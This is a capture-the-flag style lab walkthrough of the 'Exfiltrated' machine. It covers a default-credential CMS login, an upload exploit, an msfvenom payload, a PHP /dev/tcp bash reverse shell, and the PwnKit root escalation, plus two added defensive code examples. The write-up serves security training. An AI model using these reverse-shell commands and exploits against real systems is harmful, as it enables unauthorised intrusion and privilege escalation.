OSCP Lab -- Exfiltrated
Key points: (1) PHP reverse shell inserted via the CMS sitemap generator; (2) privilege escalation with CVE-2021-4034; (3) privilege escalation via a root cron job [CVE-2021-22204]
1. nmap scan
```bash
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.155.163 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-13 13:03 EDT
Nmap scan report for 192.168.155.163
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.55 seconds
```
2. User priv
2.1 Admin panel found [login with default password]: CMS version Subrion CMS v4.2.1
```bash
## Googled the default credentials admin:admin and logged in:
http://exfiltrated.offsec/panel/
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit Subrion CMS
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/49876.py
  Exploit: Subrion CMS 4.2.1 - Arbitrary File Upload
      URL: https://www.exploit-db.com/exploits/49876
     Path: /usr/share/exploitdb/exploits/php/webapps/49876.py
    Codes: CVE-2018-19422
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (956)
Copied to: /root/Desktop/49876.py
### CVE-2018-19422 RCE
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel
[+] Success!
[+] Got CSRF token: mIUPOKjwTfQPSpbvwSNQoSfM7K7KeBVCDNxFFht0
[+] Trying to log in...
[x] Login failed... Check credentials
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: RBz9SBrREPnzSJo5U5xTjm4B1W12UmYXf4yGHIp0
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: duglezaogvkkmhi
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/duglezaogvkkmhi.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
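The exploit above succeeds because the upload check is an extension denylist that does not include `.phar`. The following is an added example (not Subrion's code, and the denylist is a constructed stand-in for the flawed check) contrasting that denylist with an allowlist that also verifies the file's leading bytes:

```python
import posixpath

# Constructed denylist in the style of an extension blocklist: it stops .php but
# not .phar, which is exactly what the uploaded web shell above uses.
DENYLIST = {"php", "php3", "php4", "php5", "phtml"}

# Hardened approach: accept only the image types the form expects, and confirm the
# file's leading bytes match the claimed type instead of trusting the name.
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def denylist_allows(filename: str) -> bool:
    """The weak check: accept anything whose last extension is not blocked."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENYLIST


def allowlist_allows(filename: str, data: bytes) -> bool:
    """The hardened check: exactly one expected extension plus a matching signature."""
    name = posixpath.basename(filename)          # drop any path component
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:          # no extension or a double extension
        return False
    ext = parts[1]
    if ext not in ALLOWLIST:
        return False
    return data.startswith(MAGIC[ext])
```

Whether a `.phar` upload actually executes also depends on the web server's PHP handler mapping (Ubuntu's stock Apache PHP configuration maps `.phar` to PHP), so the upload check should not be the only layer: serve uploads from a directory with script execution disabled.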
Note:
2.2 Interactive shell [reverse shell via CMS sitemap generation]
```bash
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.216 LPORT=443 -f elf -o shel443.elf
##
$ curl -o /var/www/html/subrion/zcmd.php http://192.168.45.216/zcmd.php
##
$ curl -o /tmp/linpeas.sh http://192.168.45.216/linpeas.sh
$ ls -al /tmp
total 820
drwxrwxrwt  2 root     root       4096 Mar 13 17:47 .
drwxr-xr-x 20 root     root       4096 Jan  7  2021 ..
-rw-r--r--  1 www-data www-data 830030 Mar 13 17:47 linpeas.sh
$ chmod +x /tmp/linpeas.sh
$ ls -al /tmp
total 820
drwxrwxrwt  2 root     root       4096 Mar 13 17:47 .
drwxr-xr-x 20 root     root       4096 Jan  7  2021 ..
-rw-r--r--  1 www-data www-data 830030 Mar 13 17:47 linpeas.sh
```
Using a reverse web shell:
All of the methods above failed to return a reverse shell; I checked the writeup: https://lipa.tech/posts/pg-exfiltrated/
It shows another way to get one: System -> Hooks -> sitemapGeneration -> insert the code below -> Save -> start an nc listener on Kali -> click Generate Sitemap and the shell connects back.
Site Map Generator -> insert the PHP code -> after clicking Generate Sitemap the reverse shell comes back:
```php
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.45.178/80 0>&1'");
```
3. Root priv
3.1 Privilege escalation with CVE-2021-4034:
```bash
## linpeas.sh enumeration:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/image-exif.sh
##
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
### CVE-2021-4034 privilege escalation
www-data@exfiltrated:/tmp$ wget http://192.168.45.178:8000/CVE-2021-4034.py
wget http://192.168.45.178:8000/CVE-2021-4034.py
--2024-03-14 03:04:52--  http://192.168.45.178:8000/CVE-2021-4034.py
Connecting to 192.168.45.178:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: 'CVE-2021-4034.py'
CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.001s
2024-03-14 03:04:53 (4.64 MB/s) - 'CVE-2021-4034.py' saved [3262/3262]
www-data@exfiltrated:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@exfiltrated:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# whoami
whoami
root
# uname -a
uname -a
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cat /root/proof.txt
cat /root/proof.txt
7c08fe47f1fdddee1970c01bc246be58
# ls /home/
ls /home/
coaran
# cat /home/coaran/local.txt
cat /home/coaran/local.txt
5e686fd428f8c1db63fa9cb98adcda52
```
3.2 Privilege escalation with CVE-2021-22204 [exiftool] combined with the root cron job [the cron job pulls in a vulnerable open-source tool]
```bash
https://lipa.tech/posts/pg-exfiltrated/#escalation
##
https://al1z4deh.medium.com/proving-grounds-exfiltrated-cbf5a3209865
##
https://github.com/mr-tuhin/CVE-2021-22204-exiftool
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b
```
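The crontab recovered by linpeas in 3.1 contains `* * * * * root bash /opt/image-exif.sh`, the every-minute root job that section 3.2 ties to the vulnerable exiftool. The audit script below is an added example (not from the page, the writeups, or the box) that parses system-crontab lines and flags root jobs calling scripts outside the standard `run-parts` directories: a script writable by non-root users, a missing script, or a custom script run every minute. File modes come from an injectable `mode_of` callback so the check runs offline; on a live host, pass a wrapper around `os.stat`.

```python
import re
import stat

# Constructed sample: the system crontab lines reported by linpeas above.
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root bash /opt/image-exif.sh
"""
# Scripts under the standard run-parts directories are normally package-managed; the
# audit focuses on anything else a root job executes.
STANDARD_DIRS = ("/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly")


def parse_system_crontab(text):
    """Return (schedule, user, command) tuples; skips comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue
        parts = line.split(None, 6)      # 5 schedule fields, user, command
        if len(parts) == 7:
            jobs.append((" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def audit_root_jobs(text, mode_of):
    """Flag root jobs that run non-standard scripts which are writable by non-root users,
    do not exist, or run every minute. mode_of(path) returns st_mode, or None if the
    path is absent (on a live host: os.stat(path).st_mode inside a FileNotFoundError guard)."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in re.findall(r"/[\w./-]+", command):   # absolute paths in the command
            if path.startswith(STANDARD_DIRS):
                continue
            mode = mode_of(path)
            if mode is None:
                findings.append(f"{path}: run by root but does not exist")
            elif mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(f"{path}: writable by non-root users, run by root ({schedule})")
            elif schedule == "* * * * *":
                findings.append(f"{path}: root job every minute; review what it reads and which tools it calls")
    return findings
```

The every-minute finding is the one that matters here: the script itself may be root-owned and unwritable, yet still feed user-controlled uploads to a tool with a known parsing vulnerability.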
4. Summary:
```bash
## writeup:
https://lipa.tech/posts/pg-exfiltrated/
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b
```